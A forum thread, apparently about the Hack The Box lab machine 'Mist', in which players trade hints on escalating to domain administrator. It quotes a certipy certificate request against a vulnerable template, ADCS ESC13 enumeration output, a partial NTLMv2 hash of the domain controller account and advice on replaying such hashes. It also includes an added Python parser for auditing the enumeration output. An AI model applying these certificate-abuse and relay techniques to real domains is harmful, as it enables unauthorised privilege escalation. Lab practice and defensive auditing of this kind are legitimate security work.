HTB - Mist
by ghostess256 - Friday March 29, 2024 at 10:25 PM
dm please we can reach the goal together
Reply
read the github page better! auth is your friend, but are you able to generate an administrator .pfx?????

for everyone who asks me things, like sharon.. i can't write PMs till tomorrow! 1st time i've reached my limit/day ...
feel free to pm with your discord and your actual situation
Reply
(Apr 06, 2024, 07:05 AM)ByteBuster Wrote: I'm not very clear on this... we are supposed to be able to enroll the template and get the permissions of the group? OID

certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'Vulnerable template'

But how can we use the generated certificate svc_cabackup.pfx, or I don't know if there is any trick in how to get the certificate correctly

Has anyone tried this shit with powershell? Cry

https://posts.specterops.io/adcs-esc13-a...a4272fbd53
Check-ADCSESC13.ps1 output:
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> ./Check-ADCSESC13.ps1
Enumerating OIDs
------------------------
OID 14514029.01A0D91BA39F2716F6917FF97B18C130 links to group: CN=Certificate Managers,CN=Users,DC=mist,DC=htb

OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
OID 979197.E044723721C6681BECDB4DDD43B151CC links to group: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb

OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Enumerating certificate templates
------------------------
Certificate template ManagerAuthentication may be used to obtain membership of CN=Certificate Managers,CN=Users,DC=mist,DC=htb

Certificate template Name: ManagerAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
Certificate template BackupSvcAuthentication may be used to obtain membership of CN=ServiceAccounts,OU=Services,DC=mist,DC=htb

Certificate template Name: BackupSvcAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Reply
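The Check-ADCSESC13.ps1 output quoted above is what a PKI administrator reviews to decide whether each issuance-policy OID's msDS-OIDToGroupLink is intended. As an added example (not code from the thread or from the SpecterOps script), the following Python turns that output into one finding per template, resolving the group CN and checking that the template's OID really points at an OID object linking to the same group. The sample input is copied from the thread's output, trimmed of the duplicate DisplayName lines; a real audit would read the script's output from a file instead.

```python
"""Summarise Check-ADCSESC13.ps1 output as template -> group findings (added example)."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Sample input copied from the Check-ADCSESC13.ps1 output quoted in the thread
# (DisplayName lines dropped, as they repeat msPKI-Cert-Template-OID).
SAMPLE_OUTPUT = """Enumerating OIDs
------------------------
OID 14514029.01A0D91BA39F2716F6917FF97B18C130 links to group: CN=Certificate Managers,CN=Users,DC=mist,DC=htb

OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
OID 979197.E044723721C6681BECDB4DDD43B151CC links to group: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb

OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Enumerating certificate templates
------------------------
Certificate template ManagerAuthentication may be used to obtain membership of CN=Certificate Managers,CN=Users,DC=mist,DC=htb

Certificate template Name: ManagerAuthentication
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
Certificate template BackupSvcAuthentication may be used to obtain membership of CN=ServiceAccounts,OU=Services,DC=mist,DC=htb

Certificate template Name: BackupSvcAuthentication
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
"""


class Finding(NamedTuple):
    template: str
    oid: str
    group_dn: str
    group_cn: str
    oid_link_consistent: bool  # the OID object's msDS-OIDToGroupLink names the same group


_SEPARATOR = re.compile(r"^-{5,}[ \t]*$", re.M)


def _field(block: str, name: str) -> Optional[str]:
    """Return the value of a 'name: value' line inside one output block, if present."""
    m = re.search(r"^" + re.escape(name) + r":[ \t]*(.+?)[ \t]*$", block, re.M)
    return m.group(1) if m else None


def cn_of(dn: str) -> str:
    """First RDN value of a distinguished name, e.g. 'Certificate Managers'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def parse_esc13_output(text: str) -> Tuple[Dict[str, str], List[Tuple[str, str, str]]]:
    """Split the script output into OID-object blocks and template blocks."""
    oid_to_group: Dict[str, str] = {}            # msPKI-Cert-Template-OID -> group DN
    templates: List[Tuple[str, str, str]] = []   # (template name, OID, group DN)
    for block in _SEPARATOR.split(text):
        oid = _field(block, "OID msPKI-Cert-Template-OID")
        group = _field(block, "OID msDS-OIDToGroupLink")
        if not oid or not group:
            continue  # header blocks such as "Enumerating OIDs" carry no fields
        template = _field(block, "Certificate template Name")
        if template:
            templates.append((template, oid, group))
        else:
            oid_to_group[oid] = group
    return oid_to_group, templates


def audit_esc13(text: str) -> List[Finding]:
    """One Finding per template whose issuance-policy OID is linked to an AD group."""
    oid_to_group, templates = parse_esc13_output(text)
    return [
        Finding(t, oid, group, cn_of(group), oid_to_group.get(oid) == group)
        for t, oid, group in templates
    ]


if __name__ == "__main__":
    for f in audit_esc13(SAMPLE_OUTPUT):
        print(f"{f.template:26} -> {f.group_cn:22} (OID link consistent: {f.oid_link_consistent})")
```

Each finding is a review item: a template that maps, through its issuance policy, to a group. Whether that mapping is acceptable depends on who can enrol in the template and what the group can do; a link to a group with rights over the CA or over other accounts is the kind of entry an administrator would want to either justify or remove.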
ADCS ESC13 is the way to get root.
Reply
(Apr 05, 2024, 03:01 PM)manamana Wrote: I still use ligolo-ng, failed, any hints?

follow that instruction, it works for me; tell them where you are facing the issue and what error came up
Reply
[SMB] NTLMv2-SSP Client : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MIST:5ebacbd98eda...


what to do with this
Reply
Damn I'm so close now. just need a final nudge
How can I use the ticket with special permissions on the DC?
SMB doesn't like it. i can't pass it. no other services give me a shell...
Reply
(Apr 06, 2024, 12:29 PM)gren Wrote: [SMB] NTLMv2-SSP Client  : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash    : DC01$::MIST:5ebacbd98eda...


what to do with this

this hash is uncrackable, you cannot get DC01 NT hash or password from it
Reply
(Apr 06, 2024, 01:43 PM)Steward Wrote:
(Apr 06, 2024, 12:29 PM)gren Wrote: [SMB] NTLMv2-SSP Client  : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash    : DC01$::MIST:5ebacbd98eda...


what to do with this

this hash is uncrackable, you cannot get DC01 NT hash or password from it

I'm not there yet, but you can replay NTLMv2 hashes if you can't crack them. If that's any help
Reply
(Apr 06, 2024, 01:30 PM)sharonmalone Wrote: Damn I'm so close now. just need a final nudge
How can I use the ticket with special permissions on the DC?
SMB doesn't like it. i can't pass it. no other services give me a shell...

omg what a slog!
over all it was a great challenge
dm if you want hints. not long left
Reply

